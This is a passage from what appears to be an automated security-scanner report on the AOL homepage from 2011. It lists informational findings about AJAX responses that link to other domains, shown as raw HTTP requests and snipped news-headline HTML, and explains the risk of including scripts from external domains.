<span id="slduration" title="10000"></span>
<div class="mnid-dl11 plid-87530 display-lightbox">
<span class="dn" id="dl-vid"><
...[SNIP]...
</span>
<a id="dlimg" name="om_dl11_image" class="photo-link lnid-sec1_lnk1 icid-maing-grid7|main5|dl11|sec1_lnk1|87530" href="http://www.dailyfinance.com/2011/08/17/social-security-mistakenly-declares-thousands-dead-each-year/"><img height="217" alt="Social Security Check" width="386" src="http://o.aolcdn.com/hss/storage/adam/2e56853d2d4dd52493a23f6b837ff837/treasury-check-386mh062911.jpg"/></a>
...[SNIP]...
<h2><a name="om_dl11_hdln" href="http://www.dailyfinance.com/2011/08/17/social-security-mistakenly-declares-thousands-dead-each-year/" class=" lnid-sec1_lnk2 icid-maing-grid7|main5|dl11|sec1_lnk2|87530">14,000 People Dead ... on Accident

</a>
...[SNIP]...
<p class="lede-link"><a name="om_dl11_cpy" href="http://www.dailyfinance.com/2011/08/17/social-security-mistakenly-declares-thousands-dead-each-year/" class=" lnid-sec1_lnk3 icid-maing-grid7|main5|dl11|sec1_lnk3|87530">Signs you were affected by mistake
</a>
...[SNIP]...
<li ><a name="om_dl11_slede1" class="dl-sublede-link bold lnid-sec3_lnk1 icid-maing-grid7|main5|dl11|sec3_lnk1|87530" href="http://www.huffingtonpost.com/2011/08/18/wall-street-sell-off_n_930510.html">Dow Sent Into a Freefall</a>
...[SNIP]...
<li ><a name="om_dl11_slede2" class="dl-sublede-link bold lnid-sec3_lnk2 icid-maing-grid7|main5|dl11|sec3_lnk2|87530" href="http://www.huffingtonpost.com/2011/08/17/charinez-jefferson-pregna_n_929165.html?">Pregnant Mom Killed, Baby Lives</a>
...[SNIP]...
<li ><a name="om_dl11_slede3" class="dl-sublede-link bold lnid-sec3_lnk3 icid-maing-grid7|main5|dl11|sec3_lnk3|87530" href="http://www.huffingtonpost.com/2011/08/18/bad-hair-bandit-cynthia-v_n_930333.html?ir=Crime">Alleged 'Bad Hair Bandit' Arrested</a>
...[SNIP]...

6.23. http://www.aol.com/ajax.jsp

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.aol.com
Path:   /ajax.jsp

Issue detail

The page was loaded from a URL containing a query string. The response contains the following links to other domains:

Request

GET /ajax.jsp?m=dynamiclead&p=dynamicleadslide&vbclass=vid_over&dlNo=8&ajax=1&sitHot=&offset=0&slot=dynamiclead&vcslot=dynamiclead-video-config HTTP/1.1
Host: www.aol.com
Proxy-Connection: keep-alive
Referer: http://www.aol.com/
Aolcom-Ajax: 1
X-Requested-With: XMLHttpRequest
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.112 Safari/535.1
Accept: text/html, */*; q=0.01
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: s_vi=[CS]v1|2722E86A051D367A-6000013620041512[CE]; tst=%2C1%2Cs391a%3A%2C1%2Cs392a%3A%2C1%2Cs393a%3A%2C1%2Cs394a%3A%2C1%2Cs395a%3A%2C1%2Cs396a%3A%2C1%2Cs397a; s_pers=%20s_getnr%3D1313705608337-New%7C1376777608337%3B%20s_nrgvo%3DNew%7C1376777608338%3B; s_sess=%20s_cc%3Dtrue%3B%20s_sq%3D%3B; rrpmo1=rr1~1~1313705590192~0; stips5=1; dlact=dl5; UNAUTHID=1.1e73089cc54a11e0be833dd12c581347.7e0f; CUNAUTHID=1.1e73089cc54a11e0be833dd12c581347.7e0f

Response

HTTP/1.1 200 OK
Date: Thu, 18 Aug 2011 22:14:43 GMT
Server: Apache-Coyote/1.1
Pragma: no-cache
Cache-Control: no-cache, no-store, private, max-age=0
Expires: 0
R-Host: vm-207-200-106-91.asset.aol.com
Content-Type: text/javascript;charset=UTF-8
ntCoent-Length: 2509
Set-Cookie: JSESSIONID=18ED7455EE75E00DE6B9FB9F5B816AFC; Path=/aol
Content-Length: 2509

<span class="dn" id="#curr-dlcount">25</span>
<span id="slduration" title="10000"></span>
<div class="mnid-dl8 plid-87557 display-lightbox">
<span class="dn" id="dl-vid"></
...[SNIP]...
</span>
<a id="dlimg" name="om_dl8_image" class="photo-link lnid-sec1_lnk1 icid-maing-grid7|main5|dl8|sec1_lnk1|87557" href="http://www.huffingtonpost.com/2011/08/18/students-passing-regents-_n_930582.html?1313689589 "><img height="217" alt="Rapping Teachers" width="386" src="http://o.aolcdn.com/hss/storage/adam/ecb0af04c26491f7ca5cd442334300f9/teacher-hip-hopping-info-passing-regents-386kk.jpg"/></a>
...[SNIP]...
<h2><a name="om_dl8_hdln" href="http://www.huffingtonpost.com/2011/08/18/students-passing-regents-_n_930582.html?1313689589" class=" lnid-sec1_lnk2 icid-maing-grid7|main5|dl8|sec1_lnk2|87557">Teachers' Tactic Is Unconventional</a>
...[SNIP]...
<p class="lede-link"><a name="om_dl8_cpy" href="http://www.huffingtonpost.com/2011/08/18/students-passing-regents-_n_930582.html?1313689589 " class=" lnid-sec1_lnk3 icid-maing-grid7|main5|dl8|sec1_lnk3|87557">Method has grades 'rapidly rising' </a>
...[SNIP]...
<li ><a name="om_dl8_slede1" class="dl-sublede-link bold lnid-sec3_lnk1 icid-maing-grid7|main5|dl8|sec3_lnk1|87557" href="http://www.huffingtonpost.com/birute-regine/wall-stree-retrothe-two-q_b_929247.html">Interviewer's 2 Shocking Questions</a>
...[SNIP]...
<li ><a name="om_dl8_slede2" class="dl-sublede-link bold lnid-sec3_lnk2 icid-maing-grid7|main5|dl8|sec3_lnk2|87557" href="http://www.huffingtonpost.com/robert-hughes/should-reconciliation-ser_b_927937.html">5 Words That Can Save a Marriage</a>
...[SNIP]...
<li ><a name="om_dl8_slede3" class="dl-sublede-link bold lnid-sec3_lnk3 icid-maing-grid7|main5|dl8|sec3_lnk3|87557" href="http://www.huffingtonpost.com/dr-mark-hyman/get-energy-tips_b_925003.html">How to Boost Your Energy in Life</a>
...[SNIP]...

6.24. http://www.aol.com/ajax.jsp

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.aol.com
Path:   /ajax.jsp

Issue detail

The page was loaded from a URL containing a query string. The response contains the following links to other domains:

Request

GET /ajax.jsp?m=dynamiclead&p=dynamicleadslide&vbclass=vid_over&dlNo=24&ajax=1&sitHot=&offset=0&slot=dynamiclead&vcslot=dynamiclead-video-config HTTP/1.1
Host: www.aol.com
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.13) Gecko/20110504 Namoroka/3.6.13
Accept: text/html, */*; q=0.01
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip,deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Proxy-Connection: keep-alive
Aolcom-Ajax: 1
X-Requested-With: XMLHttpRequest
Referer: http://www.aol.com/
Cookie: s_vi=[CS]v1|2722E805851D03EA-400001380002FA31[CE]; tst=%2C1%2Cs391a%3A%2C1%2Cs392a%3A%2C1%2Cs393a%3A%2C1%2Cs394a%3A%2C1%2Cs395a%3A%2C1%2Cs396a%3A%2C1%2Cs397a; s_sess=%20s_cc%3Dtrue%3B%20s_sq%3D%3B; s_pers=%20s_getnr%3D1313705645120-New%7C1376777645120%3B%20s_nrgvo%3DNew%7C1376777645122%3B; UNAUTHID=1.a5de2f9cc54911e0b91bbfa5e75487be.f26b; CUNAUTHID=1.a5de2f9cc54911e0b91bbfa5e75487be.f26b; rrpmo1=rr1~1~1313705624439~0; stips5=1; dlact=dl24

Response

HTTP/1.1 200 OK
Date: Thu, 18 Aug 2011 22:18:14 GMT
Server: Apache-Coyote/1.1
Pragma: no-cache
Cache-Control: no-cache, no-store, private, max-age=0
Expires: 0
R-Host: vm-207-200-106-61.asset.aol.com
Content-Type: text/javascript;charset=UTF-8
ntCoent-Length: 2423
Set-Cookie: JSESSIONID=1F460CAABB346DA8C8AA4976548BD2D8; Path=/aol
Content-Length: 2423

<span class="dn" id="#curr-dlcount">25</span>
<span id="slduration" title="10000"></span>
<div class="mnid-dl24 plid-87341 display-lightbox">
<span class="dn" id="dl-vid"><
...[SNIP]...
<a id="dlimg" name="om_dl24_image" class="photo-link lnid-sec1_lnk1 icid-maing-grid7|main5|dl24|sec1_lnk1|87341" href="http://www.aol.com/2011/08/17/diaz-chacon-thwarts-kidnapping_n_929090.html"><img height="217" alt="Antonio Diaz Chacon" width="386" src="http://portal.aolcdn.com/p5/forms/1864/d8ff891d-e6e7-4bcc-80d9-074698d52bd2.jpg"/></a>
...[SNIP]...
<li ><a name="om_dl24_slede1" class="dl-sublede-link bold lnid-sec3_lnk1 icid-maing-grid7|main5|dl24|sec3_lnk1|87341" href="http://www.huffingtonpost.com/2011/08/17/not-guilty-ame-deal_n_929897.html">Family Pleads in Girl's Popsicle Death</a>
...[SNIP]...
<li ><a name="om_dl24_slede2" class="dl-sublede-link bold lnid-sec3_lnk2 icid-maing-grid7|main5|dl24|sec3_lnk2|87341" href="http://www.huffingtonpost.com/2011/08/17/meth-bust-tombstones-foun_n_929355.html">Surprising Find at Meth Bust</a>
...[SNIP]...

6.25. http://www.aol.com/ajax.jsp

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.aol.com
Path:   /ajax.jsp

Issue detail

The page was loaded from a URL containing a query string. The response contains the following links to other domains:

Request

GET /ajax.jsp?m=dynamiclead&p=dynamicleadslide&vbclass=vid_over&dlNo=23&ajax=1&sitHot=&offset=0&slot=dynamiclead&vcslot=dynamiclead-video-config HTTP/1.1
Host: www.aol.com
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.13) Gecko/20110504 Namoroka/3.6.13
Accept: text/html, */*; q=0.01
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip,deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Proxy-Connection: keep-alive
Aolcom-Ajax: 1
X-Requested-With: XMLHttpRequest
Referer: http://www.aol.com/
Cookie: s_vi=[CS]v1|2722E805851D03EA-400001380002FA31[CE]; tst=%2C1%2Cs391a%3A%2C1%2Cs392a%3A%2C1%2Cs393a%3A%2C1%2Cs394a%3A%2C1%2Cs395a%3A%2C1%2Cs396a%3A%2C1%2Cs397a; s_sess=%20s_cc%3Dtrue%3B%20s_sq%3D%3B; s_pers=%20s_getnr%3D1313705645120-New%7C1376777645120%3B%20s_nrgvo%3DNew%7C1376777645122%3B; UNAUTHID=1.a5de2f9cc54911e0b91bbfa5e75487be.f26b; CUNAUTHID=1.a5de2f9cc54911e0b91bbfa5e75487be.f26b; rrpmo1=rr1~1~1313705624439~0; stips5=1; dlact=dl23

Response

HTTP/1.1 200 OK
Date: Thu, 18 Aug 2011 22:18:03 GMT
Server: Apache-Coyote/1.1
Pragma: no-cache
Cache-Control: no-cache, no-store, private, max-age=0
Expires: 0
R-Host: vm-149-174-173-56.asset.aol.com
Content-Type: text/javascript;charset=UTF-8
ntCoent-Length: 2517
Set-Cookie: JSESSIONID=7395E03458A480AF327A9596BAA6AACB; Path=/aol
Content-Length: 2517

<span class="dn" id="#curr-dlcount">25</span>
<span id="slduration" title="10000"></span>
<div class="mnid-dl23 plid-87452 display-lightbox">
<span class="dn" id="dl-vid"><
...[SNIP]...
</span>
<a id="dlimg" name="om_dl23_image" class="photo-link lnid-sec1_lnk1 icid-maing-grid7|main5|dl23|sec1_lnk1|87452" href="http://www.huffingtonpost.com/2011/08/18/standard-poors-investigation-mortgage-ratings_n_930237.html"><img height="217" alt="S&P" width="386" src="http://i.huffpost.com/gen/332233/thumbs/a-SP-386x217.jpg"/></a>
...[SNIP]...
<h2><a name="om_dl23_hdln" onclick=" " href="http://www.huffingtonpost.com/2011/08/18/standard-poors-investigation-mortgage-ratings_n_930237.html" class=" lnid-sec1_lnk2 icid-maing-grid7|main5|dl23|sec1_lnk2|87452">S&P Under Fire for Bad Ratings</a>
...[SNIP]...
<p class="lede-link"><a name="om_dl23_cpy" href="http://www.huffingtonpost.com/2011/08/18/standard-poors-investigation-mortgage-ratings_n_930237.html" class=" lnid-sec1_lnk3 icid-maing-grid7|main5|dl23|sec1_lnk3|87452">How they might have profited big time</a>
...[SNIP]...
<li ><a name="om_dl23_slede1" class="dl-sublede-link bold lnid-sec3_lnk1 icid-maing-grid7|main5|dl23|sec3_lnk1|87452" href="http://www.huffingtonpost.com/2011/08/18/bp-sheen-gulf-mexico_n_930156.html">Another BP Oil Spill?
</a>
...[SNIP]...
<li ><a name="om_dl23_slede2" class="dl-sublede-link bold lnid-sec3_lnk2 icid-maing-grid7|main5|dl23|sec3_lnk2|87452" href="http://www.huffingtonpost.com/2011/08/17/christine-odonnell-walks-out-witchcraft_n_929986.html">O'Donnell Storms Out of Interview</a>
...[SNIP]...
<li ><a name="om_dl23_slede3" class="dl-sublede-link bold lnid-sec3_lnk3 icid-maing-grid7|main5|dl23|sec3_lnk3|87452" href="http://www.huffingtonpost.com/2011/08/17/david-letterman-death-threat-al-qaeda_n_929656.html">Letterman's Jihadist Death Threat</a>
...[SNIP]...

6.26. http://www.aol.com/ajax.jsp

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.aol.com
Path:   /ajax.jsp

Issue detail

The page was loaded from a URL containing a query string. The response contains the following links to other domains:

Request

GET /ajax.jsp?m=dynamiclead&p=dynamicleadslide&vbclass=vid_over&dlNo=6&ajax=1&sitHot=&offset=0&slot=dynamiclead&vcslot=dynamiclead-video-config HTTP/1.1
Host: www.aol.com
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.13) Gecko/20110504 Namoroka/3.6.13
Accept: text/html, */*; q=0.01
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip,deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Proxy-Connection: keep-alive
Aolcom-Ajax: 1
X-Requested-With: XMLHttpRequest
Referer: http://www.aol.com/
Cookie: s_vi=[CS]v1|2722E805851D03EA-400001380002FA31[CE]; tst=%2C1%2Cs391a%3A%2C1%2Cs392a%3A%2C1%2Cs393a%3A%2C1%2Cs394a%3A%2C1%2Cs395a%3A%2C1%2Cs396a%3A%2C1%2Cs397a; s_sess=%20s_cc%3Dtrue%3B%20s_sq%3D%3B; s_pers=%20s_getnr%3D1313705645120-New%7C1376777645120%3B%20s_nrgvo%3DNew%7C1376777645122%3B; UNAUTHID=1.a5de2f9cc54911e0b91bbfa5e75487be.f26b; CUNAUTHID=1.a5de2f9cc54911e0b91bbfa5e75487be.f26b; rrpmo1=rr1~1~1313705624439~0; stips5=1; dlact=dl6

Response

HTTP/1.1 200 OK
Date: Thu, 18 Aug 2011 22:14:50 GMT
Server: Apache-Coyote/1.1
Pragma: no-cache
Cache-Control: no-cache, no-store, private, max-age=0
Expires: 0
R-Host: vm-207-200-106-72.asset.aol.com
Content-Type: text/javascript;charset=UTF-8
ntCoent-Length: 2448
Set-Cookie: JSESSIONID=A02527ABEC4259041FFDEB197F860A5E; Path=/aol
Content-Length: 2448

<span class="dn" id="#curr-dlcount">25</span>
<span id="slduration" title="10000"></span>
<div class="mnid-dl6 plid-87569 display-lightbox">
<span class="dn" id="dl-vid"></
...[SNIP]...
<a id="dlimg" name="om_dl6_image" class="photo-link lnid-sec1_lnk1 icid-maing-grid7|main5|dl6|sec1_lnk1|87569" href="http://news.travel.aol.com/2011/08/18/gma-picks-most-beautiful-place-in-america/"><img height="217" alt="The Most Beautiful Place in America" width="386" src="http://o.aolcdn.com/hss/storage/adam/cb8bf36e344127187bde3be2fce5c563/dunes-386az08182011.jpg"/></a>
...[SNIP]...
<li ><a name="om_dl6_slede1" class="dl-sublede-link bold lnid-sec3_lnk1 icid-maing-grid7|main5|dl6|sec3_lnk1|87569" href="http://www.gadling.com/2011/08/18/inside-donald-trumps-757/">Inside Donald Trump's Airplane</a>
...[SNIP]...

6.27. http://www.aol.com/ajax.jsp

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.aol.com
Path:   /ajax.jsp

Issue detail

The page was loaded from a URL containing a query string. The response contains the following links to other domains:

Request

GET /ajax.jsp?m=dynamiclead&p=dynamicleadslide&vbclass=vid_over&dlNo=5&ajax=1&sitHot=&offset=0&slot=dynamiclead&vcslot=dynamiclead-video-config HTTP/1.1
Host: www.aol.com
Proxy-Connection: keep-alive
Referer: http://www.aol.com/
Aolcom-Ajax: 1
X-Requested-With: XMLHttpRequest
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.112 Safari/535.1
Accept: text/html, */*; q=0.01
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: s_vi=[CS]v1|2722E86A051D367A-6000013620041512[CE]; tst=%2C1%2Cs391a%3A%2C1%2Cs392a%3A%2C1%2Cs393a%3A%2C1%2Cs394a%3A%2C1%2Cs395a%3A%2C1%2Cs396a%3A%2C1%2Cs397a; s_pers=%20s_getnr%3D1313705608337-New%7C1376777608337%3B%20s_nrgvo%3DNew%7C1376777608338%3B; s_sess=%20s_cc%3Dtrue%3B%20s_sq%3D%3B; rrpmo1=rr1~1~1313705590192~0; stips5=1; UNAUTHID=1.1e73089cc54a11e0be833dd12c581347.7e0f; CUNAUTHID=1.1e73089cc54a11e0be833dd12c581347.7e0f; dlact=dl4

Response

HTTP/1.1 200 OK
Date: Thu, 18 Aug 2011 22:14:01 GMT
Server: Apache-Coyote/1.1
Pragma: no-cache
Cache-Control: no-cache, no-store, private, max-age=0
Expires: 0
R-Host: vm-149-174-174-35.asset.aol.com
Content-Type: text/javascript;charset=UTF-8
ntCoent-Length: 2579
Set-Cookie: JSESSIONID=B7808C4FF405B2653EF6C3098379C942; Path=/aol
Content-Length: 2579

<span class="dn" id="#curr-dlcount">25</span>
<span id="slduration" title="10000"></span>
<div class="mnid-dl5 plid-87399 display-lightbox">
<span class="dn" id="dl-vid"></
...[SNIP]...
</span>
<a id="dlimg" name="om_dl5_image" class="photo-link lnid-sec1_lnk1 icid-maing-grid7|main5|dl5|sec1_lnk1|87399" href="http://www.dailyfinance.com/2011/08/16/savings-experiment-get-the-best-bling-for-your-buck-when-buying/"><img height="217" alt="Secret to Saving on Diamond Ring" width="386" src="http://o.aolcdn.com/hss/storage/adam/dd176a4a16b8a6c303340f54cab9cdf6/ring-386az08172011.jpg"/></a>
...[SNIP]...
<h2><a name="om_dl5_hdln" href="http://www.dailyfinance.com/2011/08/16/savings-experiment-get-the-best-bling-for-your-buck-when-buying/" class=" lnid-sec1_lnk2 icid-maing-grid7|main5|dl5|sec1_lnk2|87399">Secrets to Buying a Diamond Ring


</a>
...[SNIP]...
<p class="lede-link"><a name="om_dl5_cpy" href="http://www.dailyfinance.com/2011/08/16/savings-experiment-get-the-best-bling-for-your-buck-when-buying/" class=" lnid-sec1_lnk3 icid-maing-grid7|main5|dl5|sec1_lnk3|87399">Minimum amount you should pay

</a>
...[SNIP]...
<li ><a name="om_dl5_slede1" class="dl-sublede-link bold lnid-sec3_lnk1 icid-maing-grid7|main5|dl5|sec3_lnk1|87399" href="http://www.dailyfinance.com/2011/08/09/savings-experiment-how-to-get-a-sun-kissed-look-for-less/">Affordable Way to Keep Your Tan
</a>
...[SNIP]...
<li ><a name="om_dl5_slede2" class="dl-sublede-link bold lnid-sec3_lnk2 icid-maing-grid7|main5|dl5|sec3_lnk2|87399" href="http://www.dailyfinance.com/2011/08/02/savings-experiment-how-to-save-money-on-a-mattress/">Mattress-Buying Mistake to Avoid</a>
...[SNIP]...
<li ><a name="om_dl5_slede3" class="dl-sublede-link bold lnid-sec3_lnk3 icid-maing-grid7|main5|dl5|sec3_lnk3|87399" href="http://www.dailyfinance.com/2011/06/07/savings-experiment-pay-less-for-household-paper-products/">How to Save More on Toilet Paper
</a>
...[SNIP]...

6.28. http://www.aol.com/ajax.jsp

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.aol.com
Path:   /ajax.jsp

Issue detail

The page was loaded from a URL containing a query string. The response contains the following links to other domains:

Request

GET /ajax.jsp?m=dynamiclead&p=dynamicleadslide&vbclass=vid_over&dlNo=17&ajax=1&sitHot=&offset=0&slot=dynamiclead&vcslot=dynamiclead-video-config HTTP/1.1
Host: www.aol.com
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.13) Gecko/20110504 Namoroka/3.6.13
Accept: text/html, */*; q=0.01
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip,deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Proxy-Connection: keep-alive
Aolcom-Ajax: 1
X-Requested-With: XMLHttpRequest
Referer: http://www.aol.com/
Cookie: s_vi=[CS]v1|2722E805851D03EA-400001380002FA31[CE]; tst=%2C1%2Cs391a%3A%2C1%2Cs392a%3A%2C1%2Cs393a%3A%2C1%2Cs394a%3A%2C1%2Cs395a%3A%2C1%2Cs396a%3A%2C1%2Cs397a; s_sess=%20s_cc%3Dtrue%3B%20s_sq%3D%3B; s_pers=%20s_getnr%3D1313705645120-New%7C1376777645120%3B%20s_nrgvo%3DNew%7C1376777645122%3B; UNAUTHID=1.a5de2f9cc54911e0b91bbfa5e75487be.f26b; CUNAUTHID=1.a5de2f9cc54911e0b91bbfa5e75487be.f26b; rrpmo1=rr1~1~1313705624439~0; stips5=1; dlact=dl17

Response

HTTP/1.1 200 OK
Date: Thu, 18 Aug 2011 22:16:55 GMT
Server: Apache-Coyote/1.1
Pragma: no-cache
Cache-Control: no-cache, no-store, private, max-age=0
Expires: 0
R-Host: vm-207-200-106-84.asset.aol.com
Content-Type: text/javascript;charset=UTF-8
ntCoent-Length: 2489
Set-Cookie: JSESSIONID=EB9AAF2FD000BB7CD4B1C4F6E469B243; Path=/aol
Content-Length: 2489

<span class="dn" id="#curr-dlcount">25</span>
<span id="slduration" title="10000"></span>
<div class="mnid-dl17 plid-87443 display-lightbox">
<span class="dn" id="dl-vid"><
...[SNIP]...
</span>
<a id="dlimg" name="om_dl17_image" class="photo-link lnid-sec1_lnk1 icid-maing-grid7|main5|dl17|sec1_lnk1|87443" href="http://www.huffingtonpost.com/2011/08/17/sam-volpendesto-war-hero-_n_930028.html"><img height="217" alt="Sam Volpendesto" width="386" src="http://i.huffpost.com/gen/332221/thumbs/a-SAM-VOLPENDESTO-386x217.jpg"/></a>
...[SNIP]...
<h2><a name="om_dl17_hdln" href="http://www.huffingtonpost.com/2011/08/17/sam-volpendesto-war-hero-_n_930028.html" class=" lnid-sec1_lnk2 icid-maing-grid7|main5|dl17|sec1_lnk2|87443">Former War Hero Sentenced to 35 Years
</a>
...[SNIP]...
<p class="lede-link"><a name="om_dl17_cpy" href="http://www.huffingtonpost.com/2011/08/17/sam-volpendesto-war-hero-_n_930028.html" class=" lnid-sec1_lnk3 icid-maing-grid7|main5|dl17|sec1_lnk3|87443">Violent crimes he committed</a>
...[SNIP]...
<li ><a name="om_dl17_slede1" class="dl-sublede-link bold lnid-sec3_lnk1 icid-maing-grid7|main5|dl17|sec3_lnk1|87443" href="http://www.huffingtonpost.com/2011/08/18/ayen-chol-girl-killed-australia-dog_n_930219.html">Girl, 4, Killed by Neighbor's Dog

</a>
...[SNIP]...
<li ><a name="om_dl17_slede2" class="dl-sublede-link bold lnid-sec3_lnk2 icid-maing-grid7|main5|dl17|sec3_lnk2|87443" href="http://www.huffingtonpost.com/2011/08/17/robert-michael-hoffman-arrested-craigslist-sexual-assaults_n_929974.html">Attorney Arrested on Rape Charges

</a>
...[SNIP]...
<li ><a name="om_dl17_slede3" class="dl-sublede-link bold lnid-sec3_lnk3 icid-maing-grid7|main5|dl17|sec3_lnk3|87443" href="http://www.huffingtonpost.com/2011/08/17/vatican-abuse-files_n_929234.html">Vatican Releases Sexual Abuse Files

</a>
...[SNIP]...

6.29. http://www.aol.com/ajax.jsp

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.aol.com
Path:   /ajax.jsp

Issue detail

The page was loaded from a URL containing a query string. The response contains the following links to other domains:

Request

GET /ajax.jsp?m=dynamiclead&p=dynamicleadslide&vbclass=vid_over&dlNo=25&ajax=1&sitHot=&offset=0&slot=dynamiclead&vcslot=dynamiclead-video-config HTTP/1.1
Host: www.aol.com
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.13) Gecko/20110504 Namoroka/3.6.13
Accept: text/html, */*; q=0.01
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip,deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Proxy-Connection: keep-alive
Aolcom-Ajax: 1
X-Requested-With: XMLHttpRequest
Referer: http://www.aol.com/
Cookie: s_vi=[CS]v1|2722E805851D03EA-400001380002FA31[CE]; tst=%2C1%2Cs391a%3A%2C1%2Cs392a%3A%2C1%2Cs393a%3A%2C1%2Cs394a%3A%2C1%2Cs395a%3A%2C1%2Cs396a%3A%2C1%2Cs397a; s_sess=%20s_cc%3Dtrue%3B%20s_sq%3D%3B; s_pers=%20s_getnr%3D1313705645120-New%7C1376777645120%3B%20s_nrgvo%3DNew%7C1376777645122%3B; UNAUTHID=1.a5de2f9cc54911e0b91bbfa5e75487be.f26b; CUNAUTHID=1.a5de2f9cc54911e0b91bbfa5e75487be.f26b; rrpmo1=rr1~1~1313705624439~0; stips5=1; dlact=dl25

Response

HTTP/1.1 200 OK
Date: Thu, 18 Aug 2011 22:18:26 GMT
Server: Apache-Coyote/1.1
Pragma: no-cache
Cache-Control: no-cache, no-store, private, max-age=0
Expires: 0
R-Host: vm-149-174-173-43.asset.aol.com
Content-Type: text/javascript;charset=UTF-8
ntCoent-Length: 2484
Set-Cookie: JSESSIONID=F04887713108D52DA6272E7118597A0B; Path=/aol
Content-Length: 2484

<span class="dn" id="#curr-dlcount">25</span>
<span id="slduration" title="10000"></span>
<div class="mnid-dl25 plid-87351 display-lightbox">
<span class="dn" id="dl-vid"><
...[SNIP]...
</span>
<a id="dlimg" name="om_dl25_image" class="photo-link lnid-sec1_lnk1 icid-maing-grid7|main5|dl25|sec1_lnk1|87351" href="http://www.huffingtonpost.com/2011/08/17/obama-job-approval-economy_n_929850.html"><img height="217" alt="President Barack Obama" width="386" src="http://portal.aolcdn.com/p5/forms/1865/ac4c6e8e-ec37-4ad9-94ea-23ba91b148cf.jpg"/></a>
...[SNIP]...
<h2><a name="om_dl25_hdln" href="http://www.huffingtonpost.com/2011/08/17/obama-job-approval-economy_n_929850.html" class=" lnid-sec1_lnk2 icid-maing-grid7|main5|dl25|sec1_lnk2|87351">Obama's Approval Hits All-Time Low</a>
...[SNIP]...
<p class="lede-link"><a name="om_dl25_cpy" href="http://www.huffingtonpost.com/2011/08/17/obama-job-approval-economy_n_929850.html" class=" lnid-sec1_lnk3 icid-maing-grid7|main5|dl25|sec1_lnk3|87351">The number he'd rather not see</a>
...[SNIP]...
<li ><a name="om_dl25_slede1" class="dl-sublede-link bold lnid-sec3_lnk1 icid-maing-grid7|main5|dl25|sec3_lnk1|87351" href="http://www.huffingtonpost.com/2011/08/17/1-hour-of-tv-lifespan-22-minutes_n_929321.html">Watching TV as Harmful as Smoking</a>
...[SNIP]...
<li ><a name="om_dl25_slede2" class="dl-sublede-link bold lnid-sec3_lnk2 icid-maing-grid7|main5|dl25|sec3_lnk2|87351" href="http://www.huffingtonpost.com/2011/08/17/kentucky-penis-amputation_n_929948.html">Man's Penis 'Unnecessarily Amputated'</a>
...[SNIP]...
<li ><a name="om_dl25_slede3" class="dl-sublede-link bold lnid-sec3_lnk3 icid-maing-grid7|main5|dl25|sec3_lnk3|87351" href="http://www.huffingtonpost.com/2011/08/17/ed-schultz-apologizes-rick-perry_n_929066.html">MSNBC Host Apologizes for 'Racist' Clip</a>
...[SNIP]...

7. Cross-domain script include
There are 3 instances of this issue:

Issue background

When an application includes a script from an external domain, this script is executed by the browser within the security context of the invoking application. The script can therefore do anything that the application's own scripts can do, such as accessing application data and performing actions within the context of the current user.

If you include a script from an external domain, then you are trusting that domain with the data and functionality of your application, and you are trusting the domain's own security to prevent an attacker from modifying the script to perform malicious actions within your application.

Issue remediation

Scripts should not be included from untrusted domains. If a third-party script appears to fulfil a requirement you have, then you should ideally copy the contents of that script onto your own domain and include it from there. If that is not possible (e.g. for licensing reasons), then you should consider reimplementing the script's functionality within your own code.


7.1. http://www.aol.com/

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.aol.com
Path:   /

Issue detail

The response dynamically includes the following scripts from other domains:

Request

GET / HTTP/1.1
Host: www.aol.com
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.13) Gecko/20110504 Namoroka/3.6.13
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip,deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Proxy-Connection: keep-alive
Cookie: s_vi=[CS]v1|2722E805851D03EA-400001380002FA31[CE]

Response

HTTP/1.1 200 OK
Date: Thu, 18 Aug 2011 22:13:43 GMT
Server: Apache-Coyote/1.1
Pragma: no-cache
Cache-Control: no-cache, no-store, private, max-age=0
Expires: 0
R-Host: vm-149-174-174-44.asset.aol.com
Content-Type: text/html;;charset=utf-8
Set-Cookie: JSESSIONID=CFBB5CE095545547E8FF9BC0BB462364; Path=/aol
